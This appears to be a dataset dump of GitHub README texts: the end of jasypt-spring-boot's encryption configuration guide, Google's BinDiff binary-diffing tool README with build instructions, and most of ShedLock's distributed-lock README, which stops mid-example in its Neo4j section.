jasypt.encryptor.gcm-secret-key-string="PNG5egJcwiBrd+E8go1tb9PdPvuRSmLSV3jjXBmWlIU="

#OR

jasypt.encryptor.gcm-secret-key-location=classpath:secret_key.b64

#OR

jasypt.encryptor.gcm-secret-key-location=file:/full/path/secret_key.b64

#OR

jasypt.encryptor.gcm-secret-key-location=file:relative/path/secret_key.b64
```

Optionally, you can create your own `StringEncryptor` bean:

```java
@Bean("encryptorBean")
public StringEncryptor stringEncryptor() {
    SimpleGCMConfig config = new SimpleGCMConfig();
    config.setSecretKey("PNG5egJcwiBrd+E8go1tb9PdPvuRSmLSV3jjXBmWlIU=");
    return new SimpleGCMStringEncryptor(config);
}
```

### Using a password

Alternatively, you can use a password to encrypt/decrypt properties using AES 256-GCM. The password is used to generate a key on startup, so there are a few properties you need to (or can) set:

```properties
jasypt.encryptor.gcm-secret-key-password="chupacabras"

#Optional, defaults to "1000"
jasypt.encryptor.key-obtention-iterations="1000"

#Optional, defaults to 0, no salt. If provided, specify the salt string in base64 format
jasypt.encryptor.gcm-secret-key-salt="HrqoFr44GtkAhhYN+jP8Ag=="

#Optional, defaults to PBKDF2WithHmacSHA256
jasypt.encryptor.gcm-secret-key-algorithm="PBKDF2WithHmacSHA256"
```

Make sure these parameters are the same if you're encrypting your secrets with external tools.

Optionally, you can create your own `StringEncryptor` bean:

```java
@Bean("encryptorBean")
public StringEncryptor stringEncryptor() {
    SimpleGCMConfig config = new SimpleGCMConfig();
    config.setSecretKeyPassword("chupacabras");
    config.setSecretKeyIterations(1000);
    config.setSecretKeySalt("HrqoFr44GtkAhhYN+jP8Ag==");
    config.setSecretKeyAlgorithm("PBKDF2WithHmacSHA256");
    return new SimpleGCMStringEncryptor(config);
}
```

### Encrypting properties with AES GCM-256

You can use the [Maven Plugin](#maven-plugin) or follow a similar strategy as explained in [Asymmetric Encryption](#asymmetric-encryption)'s [Encrypting Properties](#encrypting-properties)

## Demo App

The [jasypt-spring-boot-demo-samples](https://github.com/ulisesbocchio/jasypt-spring-boot-samples) repo contains working Spring Boot app examples. The main [jasypt-spring-boot-demo](https://github.com/ulisesbocchio/jasypt-spring-boot-samples/tree/master/jasypt-spring-boot-demo) Demo app explicitly sets a System property with the encryption password before the app runs. For a slightly more realistic scenario, try removing the line where the system property is set, build the app with Maven, and then run:

```
java -jar target/jasypt-spring-boot-demo-0.0.1-SNAPSHOT.jar --jasypt.encryptor.password=password
```

And you'll be passing the encryption password as a command line argument. Run it like this:

```
java -Djasypt.encryptor.password=password -jar target/jasypt-spring-boot-demo-0.0.1-SNAPSHOT.jar
```

And you'll be passing the encryption password as a System property.
If you need to pass this property as an Environment Variable, you can accomplish this by creating application.properties or application.yml and adding:

```
jasypt.encryptor.password=${JASYPT_ENCRYPTOR_PASSWORD:}
```

or in YAML

```
jasypt:
    encryptor:
        password: ${JASYPT_ENCRYPTOR_PASSWORD:}
```

Basically, what this does is define the `jasypt.encryptor.password` property pointing to a different property, `JASYPT_ENCRYPTOR_PASSWORD`, that you can set with an Environment Variable and can also override via System Properties. This technique can also be used to translate property names/values for any other library you need. This is also available in the Demo app, so you can run the Demo app like this:

```
JASYPT_ENCRYPTOR_PASSWORD=password java -jar target/jasypt-spring-boot-demo-1.5-SNAPSHOT.jar
```

**Note:** When using Gradle as the build tool, the processResources task fails because of the '$' character; to solve this you just need to escape the variable like this: '\\$'.

## Other Demo Apps

While [jasypt-spring-boot-demo](https://github.com/ulisesbocchio/jasypt-spring-boot-samples/tree/master/jasypt-spring-boot-demo) is a comprehensive Demo that showcases all possible ways to encrypt/decrypt properties, there are multiple other Demos covering isolated scenarios.
0
google/bindiff
Quickly find differences and similarities in disassembled code
bindiff binexport c-plus-plus diffing ida-plugin ida-pro java program-analysis program-differencing reverse-engineering vxsig
![BinDiff Logo](docs/images/bindiff-lockup-vertical.png)

Copyright 2011-2024 Google LLC.

# BinDiff

This repository contains the BinDiff source code. BinDiff is an open-source comparison tool for binary files to quickly find differences and similarities in disassembled code.

## Table of Contents

- [About BinDiff](#about-bindiff)
- [Quickstart](#quickstart)
- [Documentation](#documentation)
- [Codemap](#codemap)
- [Building from Source](#building-from-source)
- [License](#license)
- [Getting Involved](#getting-involved)

## About BinDiff

BinDiff is an open-source comparison tool for binary files that helps vulnerability researchers and engineers quickly find differences and similarities in disassembled code.

With BinDiff, researchers can identify and isolate fixes for vulnerabilities in vendor-supplied patches. It can also be used to port symbols and comments between disassemblies of multiple versions of the same binary. This makes tracking changes over time easier, allows organizations to retain analysis results, and enables knowledge transfer among binary analysts.

### Use Cases

* Compare binary files for x86, MIPS, ARM, PowerPC, and other architectures supported by popular [disassemblers](docs/disassemblers.md).
* Identify identical and similar functions in different binaries
* Port function names, comments and local names from one disassembly to the other
* Detect and highlight changes between two variants of the same function

## Quickstart

If you want to just get started using BinDiff, download prebuilt installation packages from the [releases page](https://github.com/google/bindiff/releases).

Note: BinDiff relies on a separate disassembler. Out of the box, it ships with support for IDA Pro, Binary Ninja and Ghidra. The [disassemblers page](docs/disassemblers.md) lists the supported configurations.

## Documentation

A subset of the existing [manual](https://www.zynamics.com/bindiff/manual) is available in the [`docs/` directory](docs/README.md).

## Codemap

BinDiff contains the following components:

* [`cmake`](cmake) - CMake build files declaring external dependencies
* [`fixtures`](fixtures) - A collection of test files to exercise the BinDiff core engine
* [`ida`](ida) - Integration with the IDA Pro disassembler
* [`java`](java) - Java source code. This contains the BinDiff visual diff user interface and its corresponding utility library.
* [`match`](match) - Matching algorithms for the BinDiff core engine
* [`packaging`](packaging) - Package sources for the installation packages
* [`tools`](tools) - Helper executables that are shipped with the product

## Building from Source

The instructions below should be enough to build both the native code and the Java based components.

More detailed build instructions will be added at a later date. This includes ready-made `Dockerfile`s and scripts for building the installation packages.

### Native code

BinDiff uses CMake to generate its build files for those components that consist of native C++ code. The following build dependencies are required:

* [BinExport](https://github.com/google/binexport) 12, the companion plugin to BinDiff that also contains a lot of shared code
* Boost 1.71.0 or higher (a partial copy of 1.71.0 ships with BinExport and will be used automatically)
* [CMake](https://cmake.org/download/) 3.14 or higher
* [Ninja](https://ninja-build.org/) for speedy builds
* GCC 9 or a recent version of Clang on Linux/macOS. On Windows, use the Visual Studio 2019 compiler and the Windows SDK for Windows 10.
* Git 1.8 or higher
* Dependencies that will be downloaded:
  * Abseil, GoogleTest, Protocol Buffers (3.14), and SQLite3
  * Binary Ninja SDK

The following build dependencies are optional:

* IDA Pro only: IDA SDK 8.0 or higher (unpack into `deps/idasdk`)

The general build steps are the same on Windows, Linux and macOS. The following shows the commands for Linux.

Download dependencies that won't be downloaded automatically:

```bash
mkdir -p build/out
git clone https://github.com/google/binexport build/binexport
unzip -q <path/to/idasdk_pro80.zip> -d build/idasdk
```

Next, configure the build directory and generate build files:

```bash
cmake -S . -B build/out -G Ninja \
  -DCMAKE_BUILD_TYPE=Release \
  -DCMAKE_INSTALL_PREFIX=build/out \
  -DBINDIFF_BINEXPORT_DIR=build/binexport \
  "-DIdaSdk_ROOT_DIR=${PWD}/build/idasdk"
```

Finally, invoke the actual build. Binaries will be placed in `build/out/bindiff-prefix`:

```bash
cmake --build build/out --config Release
(cd build/out; ctest --build-config Release --output-on-failure)
cmake --install build/out --config Release
```

### Building without IDA

To build without IDA, simply change the above configuration step to

```bash
cmake -S . -B build/out -G Ninja \
  -DCMAKE_BUILD_TYPE=Release \
  -DCMAKE_INSTALL_PREFIX=build/out \
  -DBINDIFF_BINEXPORT_DIR=build/binexport \
  -DBINEXPORT_ENABLE_IDAPRO=OFF
```

### Java GUI and yFiles

Building the Java-based GUI requires the commercial third-party graph visualisation library [yFiles](https://www.yworks.com/products/yfiles) for graph display and layout. This library is immensely powerful, and not easily replaceable.

To build, BinDiff uses Gradle 6.x and Java 11 LTS. Refer to its [installation guide](https://docs.gradle.org/6.8.3/userguide/installation.html) for instructions on how to install.

Assuming you are a yFiles license holder, set the `YFILES_DIR` environment variable to a directory containing the yFiles `y.jar` and `ysvg.jar`.

Note: BinDiff still uses the older 2.x branch of yFiles.

Then invoke Gradle to download external dependencies and build:

Windows:

```
set YFILES_DIR=<path\to\yfiles_2.17>
cd java
gradle shadowJar
```

Linux or macOS:

```
export YFILES_DIR=<path/to/yfiles_2.17>
cd java
gradle shadowJar
```

Afterwards the directory `ui/build/libs` in the `java` sub-directory should contain the self-contained `bindiff-ui-all.jar` artifact, which can be run using the standard `java -jar` command.

## Further reading / Similar tools

The original papers outlining the general ideas behind BinDiff:

* Thomas Dullien and Rolf Rolles. *Graph-Based Comparison of Executable Objects*. [bindiffsstic05-1.pdf](docs/papers/bindiffsstic05-1.pdf). SSTIC ’05, Symposium sur la Sécurité des Technologies de l’Information et des Communications. 2005.
* Halvar Flake. *Structural Comparison of Executable Objects*. [dimva_paper2.pdf](docs/papers/dimva_paper2.pdf). pp 161-173. Detection of Intrusions and Malware & Vulnerability Assessment. 2004. ISBN 3-88579-375-X.

Other tools in the same problem space:

* [Diaphora](https://github.com/joxeankoret/diaphora), an advanced program diffing tool implementing many of the same ideas.
* [TurboDiff](https://www.coresecurity.com/core-labs/open-source-tools/turbodiff-cs), a now-defunct program diffing plugin for IDA Pro.

Projects using BinDiff:

* [VxSig](https://github.com/google/vxsig), a tool to automatically generate AV byte signatures from sets of similar binaries.

## License

BinDiff is licensed under the terms of the Apache license. See [LICENSE](LICENSE) for more information.
## Getting Involved If you want to contribute, please read [CONTRIBUTING.md](CONTRIBUTING.md) before sending pull requests. You can also report bugs or file feature requests.
0
lukas-krecan/ShedLock
Distributed lock for your scheduled tasks
null
ShedLock
========
[![Apache License 2](https://img.shields.io/badge/license-ASF2-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0.txt) [![Build Status](https://github.com/lukas-krecan/ShedLock/workflows/CI/badge.svg)](https://github.com/lukas-krecan/ShedLock/actions) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/net.javacrumbs.shedlock/shedlock-parent/badge.svg)](https://maven-badges.herokuapp.com/maven-central/net.javacrumbs.shedlock/shedlock-parent)

ShedLock makes sure that your scheduled tasks are executed at most once at the same time. If a task is being executed on one node, it acquires a lock which prevents execution of the same task from another node (or thread). Please note that **if one task is already being executed on one node, execution on other nodes does not wait, it is simply skipped**.

ShedLock uses an external store like Mongo, JDBC database, Redis, Hazelcast, ZooKeeper or others for coordination.

Feedback and pull-requests welcome!

#### ShedLock is not a distributed scheduler

Please note that ShedLock is not and will never be a full-fledged scheduler, it's just a lock. If you need a distributed scheduler, please use another project ([db-scheduler](https://github.com/kagkarlsson/db-scheduler), [JobRunr](https://www.jobrunr.io/en/)). ShedLock is designed to be used in situations where you have scheduled tasks that are not ready to be executed in parallel, but can be safely executed repeatedly. Moreover, the locks are time-based and ShedLock assumes that clocks on the nodes are synchronized.

+ [Versions](#versions)
+ [Components](#components)
+ [Usage](#usage)
+ [Lock Providers](#configure-lockprovider)
  - [JdbcTemplate](#jdbctemplate)
  - [R2DBC](#r2dbc)
  - [jOOQ](#jooq-lock-provider)
  - [Micronaut Data Jdbc](#micronaut-data-jdbc)
  - [Mongo](#mongo)
  - [DynamoDB](#dynamodb)
  - [DynamoDB 2](#dynamodb-2)
  - [ZooKeeper (using Curator)](#zookeeper-using-curator)
  - [Redis (using Spring RedisConnectionFactory)](#redis-using-spring-redisconnectionfactory)
  - [Redis (using Spring ReactiveRedisConnectionFactory)](#redis-using-spring-reactiveredisconnectionfactory)
  - [Redis (using Jedis)](#redis-using-jedis)
  - [Hazelcast](#hazelcast)
  - [Couchbase](#couchbase)
  - [ElasticSearch](#elasticsearch)
  - [OpenSearch](#opensearch)
  - [CosmosDB](#cosmosdb)
  - [Cassandra](#cassandra)
  - [Consul](#consul)
  - [ArangoDB](#arangodb)
  - [Neo4j](#neo4j)
  - [Etcd](#etcd)
  - [Apache Ignite](#apache-ignite)
  - [In-Memory](#in-memory)
  - [Memcached](#memcached-using-spymemcached)
  - [Datastore](#datastore)
+ [Multi-tenancy](#multi-tenancy)
+ [Customization](#customization)
+ [Duration specification](#duration-specification)
+ [Extending the lock](#extending-the-lock)
+ [Micronaut integration](#micronaut-integration)
+ [CDI integration](#cdi-integration)
+ [Locking without a framework](#locking-without-a-framework)
+ [Troubleshooting](#troubleshooting)
+ [Modes of Spring integration](#modes-of-spring-integration)
  - [Scheduled method proxy](#scheduled-method-proxy)
  - [TaskScheduler proxy](#taskscheduler-proxy)
+ [Release notes](#release-notes)

## Versions

If you are using JDK >17 and up-to-date libraries like Spring 6, use version **5.1.0** ([Release Notes](#500-2022-12-10)). If you are on an older JDK or older libraries, use version **4.44.0** ([documentation](https://github.com/lukas-krecan/ShedLock/tree/version4)).
## Components

ShedLock consists of three parts

* Core - The locking mechanism
* Integration - integration with your application, using Spring AOP, Micronaut AOP or manual code
* Lock provider - provides the lock using an external process like SQL database, Mongo, Redis and others

## Usage

To use ShedLock, you do the following

1) Enable and configure Scheduled locking
2) Annotate your scheduled tasks
3) Configure a Lock Provider

### Enable and configure Scheduled locking (Spring)

First of all, we have to import the project

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-spring</artifactId>
    <version>5.13.0</version>
</dependency>
```

Now we need to integrate the library with Spring. In order to enable scheduler locking, use the `@EnableSchedulerLock` annotation

```java
@Configuration
@EnableScheduling
@EnableSchedulerLock(defaultLockAtMostFor = "10m")
class MySpringConfiguration {
    ...
}
```

### Annotate your scheduled tasks

```java
import net.javacrumbs.shedlock.spring.annotation.SchedulerLock;

...

@Scheduled(...)
@SchedulerLock(name = "scheduledTaskName")
public void scheduledTask() {
    // To assert that the lock is held (prevents misconfiguration errors)
    LockAssert.assertLocked();
    // do something
}
```

The `@SchedulerLock` annotation has several purposes. First of all, only annotated methods are locked; the library ignores all other scheduled tasks. You also have to specify the name for the lock. Only one task with the same name can be executed at the same time.

You can also set the `lockAtMostFor` attribute which specifies how long the lock should be kept in case the executing node dies. This is just a fallback; under normal circumstances the lock is released as soon as the task finishes (unless `lockAtLeastFor` is specified, see below). **You have to set `lockAtMostFor` to a value which is much longer than normal execution time.** If the task takes longer than `lockAtMostFor` the resulting behavior may be unpredictable (more than one process will effectively hold the lock).

If you do not specify `lockAtMostFor` in `@SchedulerLock`, the default value from `@EnableSchedulerLock` will be used.

Lastly, you can set the `lockAtLeastFor` attribute which specifies the minimum amount of time for which the lock should be kept. Its main purpose is to prevent execution from multiple nodes in case of really short tasks and clock difference between the nodes.

All the annotations support Spring Expression Language (SpEL).

#### Example

Let's say you have a task which you execute every 15 minutes and which usually takes a few minutes to run. Moreover, you want to execute it at most once per 15 minutes. In that case, you can configure it like this:

```java
import net.javacrumbs.shedlock.spring.annotation.SchedulerLock;

@Scheduled(cron = "0 */15 * * * *")
@SchedulerLock(name = "scheduledTaskName", lockAtMostFor = "14m", lockAtLeastFor = "14m")
public void scheduledTask() {
    // do something
}
```

By setting `lockAtMostFor` we make sure that the lock is released even if the node dies. By setting `lockAtLeastFor` we make sure it's not executed more than once in fifteen minutes. Please note that **`lockAtMostFor` is just a safety net in case the node executing the task dies, so set it to a time that is significantly larger than the maximum estimated execution time.** If the task takes longer than `lockAtMostFor`, it may be executed again and the results will be unpredictable (more processes will hold the lock).

### Configure LockProvider

There are several implementations of LockProvider.
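Before diving into the concrete providers, it may help to see how small the contract they implement is. The following is an illustrative, deliberately naive single-JVM provider (ShedLock already ships a real in-memory provider, listed in the TOC above; the type names follow the `shedlock-core` API as of 5.x, so double-check against the sources):

```java
import java.util.Optional;
import java.util.concurrent.ConcurrentHashMap;

import net.javacrumbs.shedlock.core.LockConfiguration;
import net.javacrumbs.shedlock.core.LockProvider;
import net.javacrumbs.shedlock.core.SimpleLock;

// Toy provider: locks only within one JVM and ignores lockAtMostFor /
// lockAtLeastFor. Real providers perform the same acquire/release dance
// against an external store (DB row, Redis key, ZooKeeper node, ...).
class SingleJvmLockProvider implements LockProvider {

    private final ConcurrentHashMap<String, Boolean> heldLocks = new ConcurrentHashMap<>();

    @Override
    public Optional<SimpleLock> lock(LockConfiguration configuration) {
        String name = configuration.getName();
        if (heldLocks.putIfAbsent(name, Boolean.TRUE) == null) {
            // We won the race: hand back a SimpleLock whose unlock() releases it
            return Optional.of(new SimpleLock() {
                @Override
                public void unlock() {
                    heldLocks.remove(name);
                }
            });
        }
        // Somebody else holds the lock -> the scheduled execution is skipped
        return Optional.empty();
    }
}
```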
#### JdbcTemplate

First, create the lock table (**please note that `name` has to be the primary key**)

```sql
# MySQL, MariaDB
CREATE TABLE shedlock(name VARCHAR(64) NOT NULL, lock_until TIMESTAMP(3) NOT NULL,
    locked_at TIMESTAMP(3) NOT NULL DEFAULT CURRENT_TIMESTAMP(3), locked_by VARCHAR(255) NOT NULL, PRIMARY KEY (name));

# Postgres
CREATE TABLE shedlock(name VARCHAR(64) NOT NULL, lock_until TIMESTAMP NOT NULL,
    locked_at TIMESTAMP NOT NULL, locked_by VARCHAR(255) NOT NULL, PRIMARY KEY (name));

# Oracle
CREATE TABLE shedlock(name VARCHAR(64) NOT NULL, lock_until TIMESTAMP(3) NOT NULL,
    locked_at TIMESTAMP(3) NOT NULL, locked_by VARCHAR(255) NOT NULL, PRIMARY KEY (name));

# MS SQL
CREATE TABLE shedlock(name VARCHAR(64) NOT NULL, lock_until datetime2 NOT NULL,
    locked_at datetime2 NOT NULL, locked_by VARCHAR(255) NOT NULL, PRIMARY KEY (name));

# DB2
CREATE TABLE shedlock(name VARCHAR(64) NOT NULL PRIMARY KEY, lock_until TIMESTAMP NOT NULL,
    locked_at TIMESTAMP NOT NULL, locked_by VARCHAR(255) NOT NULL);
```

Or use [this](micronaut/test/micronaut-jdbc/src/main/resources/db/liquibase-changelog.xml) liquibase change-set.

Add dependency

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-jdbc-template</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure:

```java
import net.javacrumbs.shedlock.provider.jdbctemplate.JdbcTemplateLockProvider;

...

@Bean
public LockProvider lockProvider(DataSource dataSource) {
    return new JdbcTemplateLockProvider(
        JdbcTemplateLockProvider.Configuration.builder()
            .withJdbcTemplate(new JdbcTemplate(dataSource))
            .usingDbTime() // Works on Postgres, MySQL, MariaDb, MS SQL, Oracle, DB2, HSQL and H2
            .build()
    );
}
```

By specifying `usingDbTime()` the lock provider will use UTC time based on the DB server clock. If you do not specify this option, the clock from the app server will be used (the clocks on app servers may not be synchronized, thus leading to various locking issues). It's strongly recommended to use the `usingDbTime()` option as it uses DB engine specific SQL that prevents INSERT conflicts. See more details [here](https://stackoverflow.com/a/76774461/277042).

For more fine-grained configuration use other options of the `Configuration` object

```java
new JdbcTemplateLockProvider(builder()
    .withTableName("shdlck")
    .withColumnNames(new ColumnNames("n", "lck_untl", "lckd_at", "lckd_by"))
    .withJdbcTemplate(new JdbcTemplate(getDatasource()))
    .withLockedByValue("my-value")
    .withDbUpperCase(true)
    .build())
```

If you need to specify a schema, you can set it in the table name using the usual dot notation `new JdbcTemplateLockProvider(datasource, "my_schema.shedlock")`

To use a database with case-sensitive table and column names, the `.withDbUpperCase(true)` flag can be used. Default is `false` (lowercase).

#### Warning

**Do not manually delete lock rows from the DB table.** ShedLock has an in-memory cache of existing lock rows, so a deleted row will NOT be automatically recreated until application restart. If you need to, you can edit the row/document, risking only that multiple locks will be held.

#### R2DBC

If you are really brave, you can try the experimental R2DBC support. Please keep in mind that the capabilities of this lock provider are really limited and that the whole ecosystem around R2DBC is in flux and may easily break.

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-r2dbc</artifactId>
    <version>5.13.0</version>
</dependency>
```

and use it.
```java @Override protected LockProvider getLockProvider() { return new R2dbcLockProvider(connectionFactory); } ``` I recommend using [R2DBC connection pool](https://github.com/r2dbc/r2dbc-pool). #### jOOQ lock provider First, create lock table as described in the [JdbcTemplate](#jdbctemplate) section above. Add dependency ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-jooq</artifactId> <version>5.13.0</version> </dependency> ``` Configure: ```java import net.javacrumbs.shedlock.provider.jooq; ... @Bean public LockProvider getLockProvider(DSLContext dslContext) { return new JooqLockProvider(dslContext); } ``` jOOQ provider has a bit different transactional behavior. While the other JDBC lock providers create new transaction (with REQUIRES_NEW), jOOQ [does not support setting it](https://github.com/jOOQ/jOOQ/issues/4836). ShedLock tries to create a new transaction, but depending on your set-up, ShedLock DB operations may end-up being part of the enclosing transaction. If you need to configure the table name, schema or column names, you can use jOOQ render mapping as described [here](https://github.com/lukas-krecan/ShedLock/issues/1830#issuecomment-2015820509). #### Micronaut Data Jdbc If you are using Micronaut data and you do not want to add dependency on Spring JDBC, you can use Micronaut JDBC support. Just be aware that it has just a basic functionality when compared to the JdbcTemplate provider. First, create lock table as described in the [JdbcTemplate](#jdbctemplate) section above. Add dependency ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-jdbc-micronaut</artifactId> <version>5.13.0</version> </dependency> ``` Configure: ```java import net.javacrumbs.shedlock.provider.jdbc.micronaut.MicronautJdbcLockProvider; ... @Singleton public LockProvider lockProvider(TransactionOperations<Connection> transactionManager) { return new MicronautJdbcLockProvider(transactionManager); } ``` #### Mongo Import the project ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-mongo</artifactId> <version>5.13.0</version> </dependency> ``` Configure: ```java import net.javacrumbs.shedlock.provider.mongo.MongoLockProvider; ... @Bean public LockProvider lockProvider(MongoClient mongo) { return new MongoLockProvider(mongo.getDatabase(databaseName)) } ``` Please note that MongoDB integration requires Mongo >= 2.4 and mongo-java-driver >= 3.7.0 #### Reactive Mongo Import the project ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-mongo-reactivestreams</artifactId> <version>5.13.0</version> </dependency> ``` Configure: ```java import net.javacrumbs.shedlock.provider.mongo.reactivestreams.ReactiveStreamsMongoLockProvider; ... @Bean public LockProvider lockProvider(MongoClient mongo) { return new ReactiveStreamsMongoLockProvider(mongo.getDatabase(databaseName)) } ``` Please note that MongoDB integration requires Mongo >= 4.x and mongodb-driver-reactivestreams 1.x #### DynamoDB 2 Depends on AWS SDK v2. Import the project ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-dynamodb2</artifactId> <version>5.13.0</version> </dependency> ``` Configure: ```java import net.javacrumbs.shedlock.provider.dynamodb2.DynamoDBLockProvider; ... 
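// "Shedlock" below is the DynamoDB table name used by this example; the table
// must already exist with "_id" as its partition key (see the note below).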
@Bean
public LockProvider lockProvider(software.amazon.awssdk.services.dynamodb.DynamoDbClient dynamoDB) {
    return new DynamoDBLockProvider(dynamoDB, "Shedlock");
}
```

> Please note that the lock table must be created externally with `_id` as a partition key.
> `DynamoDBUtils#createLockTable` may be used for creating it programmatically.
> A table definition is available from `DynamoDBLockProvider`'s Javadoc.

#### ZooKeeper (using Curator)
Import

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-zookeeper-curator</artifactId>
    <version>5.13.0</version>
</dependency>
```

and configure

```java
import net.javacrumbs.shedlock.provider.zookeeper.curator.ZookeeperCuratorLockProvider;

...

@Bean
public LockProvider lockProvider(org.apache.curator.framework.CuratorFramework client) {
    return new ZookeeperCuratorLockProvider(client);
}
```

By default, nodes for locks will be created under the `/shedlock` node.

#### Redis (using Spring RedisConnectionFactory)
Import

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-redis-spring</artifactId>
    <version>5.13.0</version>
</dependency>
```

and configure

```java
import net.javacrumbs.shedlock.provider.redis.spring.RedisLockProvider;
import org.springframework.data.redis.connection.RedisConnectionFactory;

...

@Bean
public LockProvider lockProvider(RedisConnectionFactory connectionFactory) {
    return new RedisLockProvider(connectionFactory, ENV);
}
```

#### Redis (using Spring ReactiveRedisConnectionFactory)
Import

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-redis-spring</artifactId>
    <version>5.13.0</version>
</dependency>
```

and configure

```java
import net.javacrumbs.shedlock.provider.redis.spring.ReactiveRedisLockProvider;
import org.springframework.data.redis.connection.ReactiveRedisConnectionFactory;

...

@Bean
public LockProvider lockProvider(ReactiveRedisConnectionFactory connectionFactory) {
    return new ReactiveRedisLockProvider.Builder(connectionFactory)
        .environment(ENV)
        .build();
}
```

The Redis lock provider uses a classical locking mechanism as described [here](https://redis.io/commands/setnx#design-pattern-locking-with-codesetnxcode), which may not be reliable in case of Redis master failure.

#### Redis (using Jedis)
Import

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-redis-jedis4</artifactId>
    <version>5.13.0</version>
</dependency>
```

and configure

```java
import net.javacrumbs.shedlock.provider.redis.jedis.JedisLockProvider;

...

@Bean
public LockProvider lockProvider(JedisPool jedisPool) {
    return new JedisLockProvider(jedisPool, ENV);
}
```

#### Hazelcast
Import the project

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-hazelcast4</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure:

```java
import net.javacrumbs.shedlock.provider.hazelcast4.HazelcastLockProvider;

...

@Bean
public HazelcastLockProvider lockProvider(HazelcastInstance hazelcastInstance) {
    return new HazelcastLockProvider(hazelcastInstance);
}
```

#### Couchbase
Import the project

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-couchbase-javaclient3</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure:

```java
import net.javacrumbs.shedlock.provider.couchbase.javaclient.CouchbaseLockProvider;

...

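// The injected Bucket is where ShedLock keeps its lock documents;
// for Couchbase 3, see the note below about the couchbase3 package.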
@Bean
public CouchbaseLockProvider lockProvider(Bucket bucket) {
    return new CouchbaseLockProvider(bucket);
}
```

For Couchbase 3 use the `shedlock-provider-couchbase-javaclient3` module and the `net.javacrumbs.shedlock.provider.couchbase3` package.

#### Elasticsearch
I am really not sure it's a good idea to use Elasticsearch as a lock provider. But if you have no other choice, you can.

Import the project

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-elasticsearch8</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure:

```java
import net.javacrumbs.shedlock.provider.elasticsearch8.ElasticsearchLockProvider;

...

@Bean
public ElasticsearchLockProvider lockProvider(ElasticsearchClient client) {
    return new ElasticsearchLockProvider(client);
}
```

#### OpenSearch
Import the project

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-opensearch</artifactId>
    <version>4.36.1</version>
</dependency>
```

Configure:

```java
import net.javacrumbs.shedlock.provider.opensearch.OpenSearchLockProvider;

...

@Bean
public OpenSearchLockProvider lockProvider(RestHighLevelClient highLevelClient) {
    return new OpenSearchLockProvider(highLevelClient);
}
```

#### CosmosDB
CosmosDB support is provided by a third-party module available [here](https://github.com/jesty/shedlock-provider-cosmosdb)

#### Cassandra
Import the project

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-cassandra</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure:

```java
import net.javacrumbs.shedlock.provider.cassandra.CassandraLockProvider;
import net.javacrumbs.shedlock.provider.cassandra.CassandraLockProvider.Configuration;

...

@Bean
public CassandraLockProvider lockProvider(CqlSession cqlSession) {
    return new CassandraLockProvider(Configuration.builder().withCqlSession(cqlSession).withTableName("lock").build());
}
```

Example for creating the default keyspace and table in a local Cassandra instance:

```sql
CREATE KEYSPACE shedlock with replication={'class':'SimpleStrategy', 'replication_factor':1} and durable_writes=true;
CREATE TABLE shedlock.lock (name text PRIMARY KEY, lockUntil timestamp, lockedAt timestamp, lockedBy text);
```

Please note that CassandraLockProvider uses the Cassandra driver v4, which has been part of Spring Boot since 2.3.

#### Consul
ConsulLockProvider has one limitation: the lockAtMostFor setting has a minimum value of 10 seconds. It is dictated by Consul's session limitations.

Import the project

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-consul</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure:

```java
import net.javacrumbs.shedlock.provider.consul.ConsulLockProvider;

...

@Bean // for Micronaut please define the preDestroy property: @Bean(preDestroy="close")
public ConsulLockProvider lockProvider(com.ecwid.consul.v1.ConsulClient consulClient) {
    return new ConsulLockProvider(consulClient);
}
```

Please note that the Consul lock provider uses the [ecwid consul-api client](https://github.com/Ecwid/consul-api), which is part of the Spring Cloud Consul integration (the `spring-cloud-starter-consul-discovery` package).

#### ArangoDB
Import the project

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-arangodb</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure:

```java
import net.javacrumbs.shedlock.provider.arangodb.ArangoLockProvider;

...

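// DB_NAME is the ArangoDB database that stores the lock documents;
// arangoTemplate.driver() exposes the underlying ArangoDB driver.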
@Bean
public ArangoLockProvider lockProvider(final ArangoOperations arangoTemplate) {
    return new ArangoLockProvider(arangoTemplate.driver().db(DB_NAME));
}
```

Please note that the ArangoDB lock provider uses the ArangoDB driver v6.7, which is part of [arango-spring-data](https://github.com/arangodb/spring-data) in version 3.3.0.

#### Neo4j
Import the project

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-neo4j</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure:

```java
import net.javacrumbs.shedlock.core.LockConfiguration;

...

@Bean
